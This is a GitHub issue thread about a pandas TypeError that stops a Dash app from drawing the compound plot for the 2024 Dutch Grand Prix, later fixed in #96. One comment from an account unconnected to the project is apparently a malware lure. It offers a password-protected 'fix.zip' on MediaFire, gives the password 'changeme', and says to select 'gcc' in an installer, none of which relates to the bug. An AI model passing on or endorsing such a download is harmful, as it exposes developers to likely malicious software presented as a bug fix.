### ISSUE TITLE
[BUG] Cannot Plot Dutch Grand Prix Compound Plot 

### ISSUE THREAD

**Issue by Casper-Guo** [Casper-Guo/Armchair-Strategist#95]
When selecting the 2024 Dutch Grand Prix, the compound performance plot will not load for any compound combination. It failed with the following traceback:

```
ERROR   app.py  Exception on /_dash-update-component [POST]
Traceback (most recent call last):
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 1473, in wsgi_app
    response = self.full_dispatch_request()
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 882, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args)  # type: ignore[no-any-return]
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/dash/dash.py", line 1373, in dispatch
    ctx.run(
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/dash/_callback.py", line 465, in add_context
    output_value = _invoke_callback(func, *func_args, **func_kwargs)
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/dash/_callback.py", line 40, in _invoke_callback
    return func(*args, **kwargs)  # %% callback invoked %%
  File "/home/robery/Armchair-Strategist/app.py", line 506, in render_compound_plot
    fig = pg.compounds_lineplot(included_laps, y, compounds)
  File "/home/robery/Armchair-Strategist/f1_visualization/plotly_dash/graphs.py", line 312, in compounds_lineplot
    median_LRT = compound_laps.groupby("TyreLife")[y].median(numeric_only=True)  # noqa: N806
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/pandas/core/groupby/groupby.py", line 2532, in median
    result = self._cython_agg_general(
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/pandas/core/groupby/groupby.py", line 1969, in _cython_agg_general
    data = self._get_data_to_aggregate(numeric_only=numeric_only, name=how)
  File "/home/robery/Armchair-Strategist/env/lib/python3.10/site-packages/pandas/core/groupby/generic.py", line 168, in _get_data_to_aggregate
    raise TypeError(
TypeError: Cannot use numeric_only=True with SeriesGroupBy.median and non-numeric dtypes.
```

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Casper-Guo** [comment]
Fixed in #96
